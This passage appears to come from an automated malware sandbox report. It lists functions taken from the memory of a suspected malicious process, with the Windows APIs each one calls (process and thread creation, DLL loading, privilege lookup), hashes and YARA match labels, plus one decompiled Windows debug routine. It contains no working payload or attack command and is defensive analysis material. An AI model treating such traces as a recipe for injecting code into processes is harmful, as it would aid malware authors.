                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E372FB
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                • Instruction ID: f26b17e360de07fa1bd27a6ebcb4787343720113d7160cba00dc2d34479bf2a0
                • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                • Instruction Fuzzy Hash: 0001A271A8022877F721AA949C43FBF7BAC5F01B51F140118FF04BA1C2EAD46A0687F6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E39B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E39BA2
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction ID: 14f2c79875214628c035b304a6b7577762ee5906ef46b069ec0c4f856b4f795e
                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction Fuzzy Hash: 6A0121B5E4020DABDF10DBE4EC46FDEB7B89B54308F0041A5E908A7242F671EB18CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E4894F, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: fb08b8a0239fd5112cc49cd1d34dfb3320bf8bca2b051ad8a370c8f5f34f8c5c
                • Instruction ID: 07134300986748c224c9ad946eda6a5d34fcdd333251511a2e3bf38c3db55663
                • Opcode Fuzzy Hash: fb08b8a0239fd5112cc49cd1d34dfb3320bf8bca2b051ad8a370c8f5f34f8c5c
                • Instruction Fuzzy Hash: 3F01AFB2201108BFCB58CF99DC81EEB77A9AF8C354F158258FA0DE7241C630E851CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E48950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction ID: d63314f187b63b9d2328c7997d65f66c81774e047c193eb07d0d88651ccd0ee3
                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction Fuzzy Hash: B701AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E47420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3CCE0,?,?), ref: 00E4745C
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
                • Instruction ID: a1aa8446902c9a4b4e12f1dad480e4ac376f88e20b7ae24a9e4ecdb494511935
                • Opcode Fuzzy Hash: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
                • Instruction Fuzzy Hash: DAE06D333853043AE22065A9BC02FA7B69C8B91B24F140026FA4DEA2C1D995F90142A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E47414, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3CCE0,?,?), ref: 00E4745C
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: a177678509b3af6295f6288d43a2490040e671a2635e2e0a1b653272c6b75601
                • Instruction ID: 5d4e00e3765e7192c70c036b0d6b68440027f29a52b331463aa98d7b9d0e1476
                • Opcode Fuzzy Hash: a177678509b3af6295f6288d43a2490040e671a2635e2e0a1b653272c6b75601
                • Instruction Fuzzy Hash: E7F0657738120036E2206558AC03F9777998B95B24F244529F749BF7C2D59AF90642A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E48A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3CFB2,00E3CFB2,?,00000000,?,?), ref: 00E48A70
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction ID: 8bebc82fc0ebaebe4734153d86aa3ed5c825135f318857aa61d85802fc60c817
                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction Fuzzy Hash: 16E01AB12002086BDB14DF49DC85EE737ADAF88650F018154BE0867242C930F8108BF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E3D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00E37C83,?), ref: 00E3D44B
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                • Instruction ID: 1e9fac953de0ef4424bddc5f269b0e7f93bf2dbd4071e21f6c4caabe3238633a
                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                • Instruction Fuzzy Hash: A9D0A7717503043BE610FAA4AC07F2672CD5B54B04F494074F948E73C3D964F5008161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0545967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                • Instruction ID: 36b5d60a8956d79581bb6e4806d44598e5eca9b425d0ae9a0c43ea53b9c5072f
                • Opcode Fuzzy Hash: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                • Instruction Fuzzy Hash: 6AB09B71D014C5C5D611D7614608B67795177D0751F56C053D1020751B4778C095F5B6
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 054AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E054AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0545CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E054A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E054A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                0x054afdda
                0x054afde2
                0x054afde5
                0x054afdec
                0x054afdfa
                0x054afdff
                0x054afe0a
                0x054afe0f
                0x054afe17
                0x054afe1e
                0x054afe19
                0x054afe19
                0x054afe19
                0x054afe20
                0x054afe21
                0x054afe22
                0x054afe25
                0x054afe40

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054AFDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054AFE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054AFE2B
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                • Instruction ID: 6060d282b4100ad26dc00b8b2ecd5856ddc08c5b773f19d901459746b84be046
                • Opcode Fuzzy Hash: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                • Instruction Fuzzy Hash: 3BF0FC372442017FDB211A45DC49FB3BF6AEB54730F240316F628595D1E972F82096F4
                Uniqueness

                Uniqueness Score: -1.00%